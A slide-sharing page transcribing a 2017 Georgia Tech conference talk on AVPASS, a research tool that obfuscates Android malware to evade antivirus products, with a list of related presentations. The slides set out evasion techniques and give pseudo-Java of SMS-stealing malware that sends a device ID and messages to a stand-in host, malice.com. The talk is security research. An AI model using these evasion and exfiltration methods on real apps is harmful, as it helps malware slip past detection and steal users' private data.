avpass automatically bypassing android malware detection
play

AVPASS: Automatically Bypassing Android Malware Detection System - PowerPoint PPT Presentation

Jun 03, 2023 •509 likes •1.25k views

AVPASS: Automatically Bypassing Android Malware Detection System Jinho Jung, Chanil Jeon, Max Wolotsky, Insu Yun, and Taesoo Kim Georgia Institute of Technology, July 27, 2017 Ab About t Us SSLab (@GT) Focusing on s ystem and security

  1. AVPASS: Automatically Bypassing Android Malware Detection System Jinho Jung, Chanil Jeon, Max Wolotsky, Insu Yun, and Taesoo Kim Georgia Institute of Technology, July 27, 2017

  2. Ab About t Us � SSLab (@GT) ✓ Focusing on s ystem and security research ✓ https://sslab.gtisc.gatech.edu/ � ISTC-ARSA ✓ Intel Science & Technology Center for Adversary-Resilient Security Analytics ✓ Strengthening the analytics behind malware detection ✓ http://www.iisp.gatech.edu/intel-arsa-center-georgia-tech/ 2

  3. In In Thi his Tal alk, k, We e Will Int Introduc oduce e AVPASS � Transform any Android malware to bypass AVs ✓ By inferring AV features and rules ✓ By obfuscating Android binary (APK) ✓ Yet supports preventing code leakage 3

  4. Tr Trend: Android Dominates Mobile OS Market Android still leads mobile market Regained share over iOS to achieve an 86 percent … http://www.businessinsider.com/smartphone-market-share-android-ios-windows-blackberry-2016-8 4 http://www.gartner.com/newsroom/id/3415117

  5. Pr Problem: Android Malware Becomes More Pr Prevalent 8,400 new Android malware everyday Security experts expect around 3.5 million new Android malware apps for 2017 5 https://www.gdatasoftware.com/blog/2017/04/29712-8-400-new-android-malware-samples-every-day

  6. On One so soluti tion: Prote tecti ting Mobile De Devi vices s with th An Anti ti-Vi Virus There are over 50 Android anti-virus software in market 6 https://www.av-test.org/en/antivirus/mobile-devices/

  7. Unfortunately, AV Solutions Known to be Weak (example: JAVA malware) 7 * Developing Managed Code Rootkits for the Java Runtime Environment, Benjamin Holland, DEFCON 24

  8. What About Android Malware? Malware! Malware 8

  9. What About Android Malware? How easy it to bypass AV software? Malware! Malware Benign App 9

  10. Challenges: Bypassing Unknown AV Solutions ① Transforming without destroying malicious features Malware! Malware Benign App ② No pre-knowledge of AV features ③ Interact without leaking own malicious features 10

  11. Approaches: Automatically Inferring and Obfuscating Detection Features � Obfuscating individual features � Inferring features and detection rules of AVs � Bypass AVs by using inferred features and rules ✓ Yet minimize information leaking by sending fake malware 11

  12. Summary of AVPASS operation � Bypassed most of AVs with 3.42 / 58 (5.8%) detections � Discovered 5 strong, 3 normal, and 2 weak impact features of AVs � Discovered bypassing rule combinations (about 30%) � Prevented code leakage when querying by using Imitation Mode 12

  13. AVPASS Overview and Workflow ① Binary Obfuscation Disguised & Bypass Malware ② Inferring Features & Rules ③ Query Safely 13

  14. What is Binary Obfuscation? Method API I Look different, Interaction Resource Class Data-flow Obfuscation String Variable but maintain same behaviors Payload Package Encrypt & Remove Features Obfuscated Application 14

  15. Main Obfuscation Features Number Obfuscation Primitives Side-Effects 1 Component interaction injection N/A 2 Dataflow analysis avoiding code injection N/A 3 String encryption N/A 4 Variable name encryption N/A 5 Package name encryption N/A 6 Method and Class name encryption N/A 7 Dummy API and benign class injection N/A 8 Bytecode injection N/A 9 Java reflection transformation N/A 10 Resource encryption (xml and image) Appearance 15

  16. APK Obfuscation Requirements � Ensure APK’s original functionalities ✓ Error- free “ smali ” code injection * Disassembled code of DEX format � Should be difficult to de-obfuscate or reverse ✓ Increase obfuscation complexities ✓ E.g., Hide all APIs by using Java reflection ✓ E.g., Encrypt all Strings with different encryption keys ✓ E.g., Apply obfuscation multiple times 16

  17. Easy Problem: Available Number of Registers .method public DoSomething() .locals 5 (+1) .method public DoSomething() .locals 4 # register: v1 – v4 used here Try # register: v0 – v3 used here Injection # code injection using v0 .end method .end method v0 v1 v2 v3 v0 v1 v2 v3 v4 Increase maximum number and shift all registers and parameters 17

  18. Tricky Problem: Limited Number of Registers .method public DoSomething (p0…p9) .locals 7 (+3) .method public DoSomething (p0…p9) .locals 4 Total: 17 Total: 14 # register: v0 – v3 used here Try # parameter: p0 – p9 used here # register: v0 – v3 used here Injection # parameter: p0 – p9 used here # instruction using p10 (v16) Inst. Range Error (> v15) .end method .end method … … … v0 v1 v2 v3 v4 v5 v13 v0 v1 v2 v6 v7 v8 v16 p0 p1 p9 p0 p1 p9 18

  19. Solution: Backup and Restore Before Injection .method public DoSomething (p0…p9) .locals 7 (+3) .method public DoSomething (p0…p9) # register: v0 – v3 used here .locals 4 # parameter: p0 – p9 used here Try # register: v0 – v3 used here Injection ① backup register v3 – v12 # parameter: p0 – p9 used here ② code injection using v0 – v2 ③ restore register v3 – v12 .end method .end method backup … v0 v1 v2 v3 v4 v5 v13 … … v23 v0 v1 v2 v3 v12 v13 restore p0 p1 p9 Why tricky? AVPASS needs to trace type of each register when backup/restore 19

  20. Difficult to Reverse as Requirement Too Easy to Detect Obfuscation? � True, but it doesn’t help AVs much ✓ How could you tell benign or malicious? Dynamic analysis can detect original behavior � ✓ However, code coverage is another challenge ✓ Not that practical due to overhead 20

  21. Example: Difficult to Reverse public class SendToNetwork (Service) { public void onStartCommand( Intent ) { String SMSmsg = intent.get (“ sms ”); TelephonyMgr tm = new TelephonyMgr(); String ID = tm.getDeviceID(); String output = ID.concat(SMSmsg); URL url = new URL(http://malice.com); url.sendData(output); } } 21

  22. Example: Difficult to Reverse classname public class SendToNetwork (Service) { Reflection Wrapper1 methodname public void onStartCommand( Intent ) { classname Reflection1 String SMSmsg = intent.get (“ sms ”); Reflection Wrapper2 methodname Reflection2 TelephonyMgr tm = new TelephonyMgr(); classname Reflection Wrapper3 methodname String ID = tm.getDeviceID(); Reflection3 classname Reflection4 Reflection Wrapper4 String output = ID.concat(SMSmsg); methodname String Enc1 URL url = new URL(http://malice.com); classname Reflection Wrapper5 methodname url.sendData(output); Reflection5 } } Encrypted MSG String Encryptor1 Decryption KEY 22

  23. Example: Difficult to Reverse classname String Enc2 public class SendToNetwork (Service) { Reflection Wrapper1 methodname String Enc3 public void onStartCommand( Intent ) { classname String Enc4 Reflection1 String SMSmsg = intent.get (“ sms ”); Reflection Wrapper2 methodname String Enc5 Reflection2 TelephonyMgr tm = new TelephonyMgr(); classname String Enc6 Reflection Wrapper3 methodname String ID = tm.getDeviceID(); Reflection3 String Enc7 classname String Enc8 Reflection4 Reflection Wrapper4 String output = ID.concat(SMSmsg); methodname String Enc9 String Enc1 URL url = new URL(http://malice.com); classname String Enc10 Reflection Wrapper5 methodname url.sendData(output); Reflection5 String Enc11 } } Encrypted MSG String Enc12 String Encryptor1 Decryption KEY String Enc13 23

  24. Example: Difficult to Reverse String Enc14 classname String Enc2 public class SendToNetwork (Service) { String Enc15 Reflection Wrapper1 methodname String Enc3 public void onStartCommand( Intent ) { classname String Enc4 Reflection1 String SMSmsg = intent.get (“ sms ”); Reflection Wrapper2 methodname String Enc5 Reflection2 TelephonyMgr tm = new TelephonyMgr(); Enc classname String Enc6 Reflection Wrapper3 methodname String ID = tm.getDeviceID(); Reflection3 String Enc7 classname String Enc8 Reflection4 Reflection Wrapper4 String output = ID.concat(SMSmsg); methodname String Enc9 String Enc1 URL url = new URL(http://malice.com); classname String Enc10 Reflection Wrapper5 methodname url.sendData(output); Reflection5 String Enc N String Enc11 } String Enc N+1 } String Enc N+2 Encrypted MSG String Enc12 String Encryptor1 Decryption KEY String Enc N+3 String Enc13 String Enc N+4 String Enc N+5 Yes, you can tell obfuscation here but difficult to reverse 24

  25. Start with Well-known Detection Techniques � API-based detection � Dataflow-based detection � Interaction-based detection � Signature-based detection 25

  26. Android Malware Example SMS Leaking Malware Component: InterceptSMS Component: SendToNetwork SMS received Leaked Information Hacker sends intercepted SMS intercepted by message to malice.com background Service 26

  27. API-based Android Malware Detection Component: InterceptSMS Component: SendToNetwork public class SendToNetwork (Service) { public class InterceptSMS (BroadcastReceiver) { public void onStartCommand( Intent ) { public void onReceive( ) { String SMSmsg = intent.get (“ sms ”); SmsMessage msg = SmsMessage.create(); String SMS = msg.getMessageBody(); TelephonyMgr tm = new TelephonyMgr(); String ID = tm.getDeviceID(); Intent si = new Intent(Malicious.class); String output = ID.concat (“ SMSmsg ”); si.putExtra (“ sms ”, SMS); URL url = new URL(http://malice.com); startService(si); url.sendData(output); Suspicious } } API sequence } } (n-gram) 27

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the explosive growth of mobile device market and usage, there is an increasing number of malicious mobile applications targeting these devices and

819 views • 44 slides
Android Malware Adventures Mert Can Cokuner Krat Ouzhan Aknc Android Malware

Android Malware Adventures Mert Can Cokuner Krat Ouzhan Aknc Android Malware

DeepSec IDSC Android Malware Adventures Mert Can Cokuner Krat Ouzhan Aknc Android Malware Adventures Agenda INTRODUCTION ANDROID MALWARE COMMAND & CONTROL QUESTIONS & ANSWERS 2 1 2 3 4 Android Malware

1.01k views • 64 slides
Apposcopy: Semantics- Based Detection of Android Malware through Static Analysis By Feng et al

Apposcopy: Semantics- Based Detection of Android Malware through Static Analysis By Feng et al

Apposcopy: Semantics- Based Detection of Android Malware through Static Analysis By Feng et al [FSE 14] Presented by Maaz Ahmad The Malware Problem (Feb, 2015) Motive Security Labs estimates 16 million infected mobile devices. [1]

828 views • 30 slides
StormDroid: A streaminglized Machine Learning-Based System for Detecting Android Malware Sen

StormDroid: A streaminglized Machine Learning-Based System for Detecting Android Malware Sen

StormDroid: A streaminglized Machine Learning-Based System for Detecting Android Malware Sen Chen, Minhui Xue, Zhushou Tang, Lihua Xu, Haojin Zhu Malware Detection in Android 1.6 million apps in Google Play Store in July 2015

441 views • 22 slides
SigPID: Significant Permission Identification for Android Malware Detection Authors: Lichao Sun,

SigPID: Significant Permission Identification for Android Malware Detection Authors: Lichao Sun,

SigPID: Significant Permission Identification for Android Malware Detection Authors: Lichao Sun, Zhiqiang Li, Qiben Yan, Witawas Srisa-an and Yu Pan Department of Computer Science and Engineering University of Nebraska Lincoln Presenters: Yu

999 views • 24 slides
Obfuscated Financial Fraud Android Malware : Detection and Behavior Tracking In Seung, Yang

Obfuscated Financial Fraud Android Malware : Detection and Behavior Tracking In Seung, Yang

Obfuscated Financial Fraud Android Malware : Detection and Behavior Tracking In Seung, Yang (KrCERT/CC, KISA) DeepSEC IDSC 2016 Friday, 11 November 2016 Analysis Team at KrCERT/CC, KISA Mobile malware analyst In Seung, Yang Who am I

1.59k views • 72 slides
Experiences of of La Landing Machine Le Learning onto Market-Scale Mobile Malware Detection

Experiences of of La Landing Machine Le Learning onto Market-Scale Mobile Malware Detection

Experiences of of La Landing Machine Le Learning onto Market-Scale Mobile Malware Detection Liangyi Gong, Zhenhua Li, Feng Qian, Zifan Zhang, Qi Alfred Chen, Zhiyun Qian, Hao Lin, Yunhao Liu Mobile Malware Detection Android App Markets

424 views • 29 slides
ANDROID MALWARE https://www.cnet.com/android-update/ Rafael Estrada Department of Mathematics

ANDROID MALWARE https://www.cnet.com/android-update/ Rafael Estrada Department of Mathematics

DATA ANALYSIS OF ANDROID MALWARE https://www.cnet.com/android-update/ Rafael Estrada Department of Mathematics New Mexico Tech Mentor: Dr. Golden G. Richard III Postdoctoral Researcher: Aisha Ali-Gombe July 26 th 2017 CCT REU 2017 ANDROID

347 views • 10 slides
A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND

A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND

A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND CONTAINMENT FOR LARGE NETWORKS CHRISTIAAN SCHADE TWENTE SECURITY LAB UNIVERSITY OF TWENTE THE NETHERLANDS MALWARE WARS In the last

313 views • 14 slides
Bypassing the Android Permission Model Georgia Weidman Founder and CEO, Bulb Security LLC Is the

Bypassing the Android Permission Model Georgia Weidman Founder and CEO, Bulb Security LLC Is the

Bypassing the Android Permission Model Georgia Weidman Founder and CEO, Bulb Security LLC Is the permission model working? Are users making good decisions? Most Popular Android App Demo App abusing permissions Demo explained Permissions:

819 views • 43 slides
Dissecting Android Malware: Characterization and Evolution 1 Problems to solve 18 Requirement

Dissecting Android Malware: Characterization and Evolution 1 Problems to solve 18 Requirement

Dissecting Android Malware: Characterization and Evolution 1 Problems to solve 18 Requirement 1: Sufficient Malware data set Anti Virus Communities or Researchers are hampered by the lack of malware data set. Req equires a a suf

648 views • 34 slides
Embracing the new threat: towards automatically, self-diversifying malware Mathias Payer

Embracing the new threat: towards automatically, self-diversifying malware Mathias Payer

Embracing the new threat: towards automatically, self-diversifying malware Mathias Payer <mathias.payer@nebelwelt.net> UC Berkeley and (soon) Purdue University Image (c) http://ucrtoday.ucr.edu/9768/assassin-bugs Malware landscape is

555 views • 27 slides
On Static Malware Detection Tayssir Touili LIPN, CNRS & Univ. Paris 13 Motivation: Malware

On Static Malware Detection Tayssir Touili LIPN, CNRS & Univ. Paris 13 Motivation: Malware

On Static Malware Detection Tayssir Touili LIPN, CNRS & Univ. Paris 13 Motivation: Malware Detection The number of new malware exceeds 75 million by the end of 2011, and is still increasing. The number of malware that produced

1.34k views • 91 slides
MALWARE DETECTION BY EATING A WHOLE EXE Presented by: Edward Raff Jared Sylvester Robert

MALWARE DETECTION BY EATING A WHOLE EXE Presented by: Edward Raff Jared Sylvester Robert

MALWARE DETECTION BY EATING A WHOLE EXE Presented by: Edward Raff Jared Sylvester Robert Brandon 1 November 2017 2 Malware Detection? Dont AVs do that? Single incidents of malware are now causing millions in damages. Potential

347 views • 19 slides
D&D of malware with exotic C&C D&D = Description & Detection C&C = Command

D&D of malware with exotic C&C D&D = Description & Detection C&C = Command

D&D of malware with exotic C&C D&D = Description & Detection C&C = Command & Control Automotive Consumer Energy & Chemicals Paul Rascagneres - @r00tbsd Eric Leblond - @Regiteric D&D of malware with exotic C&C

781 views • 34 slides
Android malware that wont make you fall asleep ukasz Siewierski lukasz.siewierski@cert.pl

Android malware that wont make you fall asleep ukasz Siewierski lukasz.siewierski@cert.pl

Android malware that wont make you fall asleep ukasz Siewierski lukasz.siewierski@cert.pl @maldr0id Hackito Ergo Sum 2015 Android malware is boring! ukasz Siewierski (@maldr0id) Android malware that wont make you fall asleep 2 / 24

535 views • 34 slides
PRAGUE-6 Trial Off-Pump Versus On-Pump Coronary Artery Bypass Graft Surgery in Patients With

PRAGUE-6 Trial Off-Pump Versus On-Pump Coronary Artery Bypass Graft Surgery in Patients With

PRAGUE-6 Trial Off-Pump Versus On-Pump Coronary Artery Bypass Graft Surgery in Patients With EuroSCORE 6 Jan Hlavicka, Zbynek Straka, Stepan Jelinek, Petr Budera, Tomas Vanek, Petr Widimsky Cardiocenter Royal Vineyards, Third

310 views • 17 slides
antivirus systems Intruducion Attila Marosi OSCE, OSCP, ECSA, CEH IT security expert at

antivirus systems Intruducion Attila Marosi OSCE, OSCP, ECSA, CEH IT security expert at

Easy ways to bypass antivirus systems Intruducion Attila Marosi OSCE, OSCP, ECSA, CEH IT security expert at GovCERT-Hungary (SSNS) Email: attila.marosi@gmail.com Web: http://marosi.hu Twitter: @0xmaro Why? All of us use

285 views • 16 slides
Debugging the Data Plane with Anteater Haohui Mai, Ahmed Khurshid Rachit Agarwal, Matthew Caesar

Debugging the Data Plane with Anteater Haohui Mai, Ahmed Khurshid Rachit Agarwal, Matthew Caesar

Debugging the Data Plane with Anteater Haohui Mai, Ahmed Khurshid Rachit Agarwal, Matthew Caesar P. Brighten Godfrey, Samuel T. King University of Illinois at Urbana-Champaign Network debugging is challenging Production networks are

929 views • 50 slides
Bypassing CSRF Protections A Double Defeat of the Double-Submit Cookie Pattern About Me

Bypassing CSRF Protections A Double Defeat of the Double-Submit Cookie Pattern About Me

Bypassing CSRF Protections A Double Defeat of the Double-Submit Cookie Pattern About Me David Johansson (@securitybits) Security consultant since 2007 Helping clients design and build secure software Security training Based in

821 views • 25 slides
Boxed Out: Blocking Cellular Interconnect Bypass Fraud at the Network Edge Brad Reaves * , Ethan

Boxed Out: Blocking Cellular Interconnect Bypass Fraud at the Network Edge Brad Reaves * , Ethan

Boxed Out: Blocking Cellular Interconnect Bypass Fraud at the Network Edge Brad Reaves * , Ethan Shernan ** , Adam Bates * , Henry Carter ** , Patrick T raynor * *Florida Institute for Cyber Security University of Florida **Georgia Institute of T

421 views • 23 slides
based Last Level Cache Kunal Korgaonkar, Ishwar Bhati, Huichu Liu, Jayesh Gaur, Sasikanth

based Last Level Cache Kunal Korgaonkar, Ishwar Bhati, Huichu Liu, Jayesh Gaur, Sasikanth

Density Tradeoffs of Non-Volatile Memory as a Replacement for SRAM based Last Level Cache Kunal Korgaonkar, Ishwar Bhati, Huichu Liu, Jayesh Gaur, Sasikanth Manipatruni, Sreenivas Subramoney, Tanay Karnik, Steven Swanson, Ian Young and Hong Wang

373 views • 18 slides
Cost-Effective Compiler Directed Memory Prefetching and Bypassing Daniel Ortega, , Eduard

Cost-Effective Compiler Directed Memory Prefetching and Bypassing Daniel Ortega, , Eduard

Cost-Effective Compiler Directed Memory Prefetching and Bypassing Daniel Ortega, , Eduard Ayguad e , Jean-Loup Baer and Mateo Valero Departamento de Arquitectura de Computadores, Department of

676 views • 39 slides
Exploi'ng Unpatched iOS Vulnerabili'es for Fun and Profit

Exploi'ng Unpatched iOS Vulnerabili'es for Fun and Profit

Exploi'ng Unpatched iOS Vulnerabili'es for Fun and Profit Yeongjin Jang, Tielei Wang, Byoungyoung Lee, and Billy Lau Georgia Tech Informa;on Security Center

989 views • 84 slides

More recommend